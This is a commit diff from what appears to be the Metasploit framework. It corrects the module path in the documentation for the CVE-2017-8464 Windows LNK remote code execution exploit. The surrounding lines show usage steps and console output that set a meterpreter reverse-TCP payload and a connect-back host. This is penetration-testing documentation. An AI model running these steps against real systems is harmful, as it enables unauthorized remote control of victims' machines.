Typo reported by @nixawk

bug/bundler_fix
Yorick Koster 2017-07-26 13:32:29 +02:00 committed by Brent Cook
parent 3229320ba9
commit 67dddd2402
1 changed files with 2 additions and 2 deletions

View File

@ -17,7 +17,7 @@ To set up the vulnerable environment, install a Windows version without the patc
### Run the exploit ### Run the exploit
1. `use exploit/windows/smb/cve_2017_8464_lnk_rce` 1. `use exploit/windows/fileformat/cve_2017_8464_lnk_rce`
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp` 2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
3. `set LHOST [ip victim connects back to]` 3. `set LHOST [ip victim connects back to]`
4. `exploit` 4. `exploit`
@ -55,7 +55,7 @@ msf exploit(handler) > exploit -j
[*] Started reverse TCP handler on 192.168.146.197:4444 [*] Started reverse TCP handler on 192.168.146.197:4444
[*] Starting the payload handler... [*] Starting the payload handler...
msf exploit(handler) > back msf exploit(handler) > back
msf > use exploit/windows/smb/cve_2017_8464_lnk_rce msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197 msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197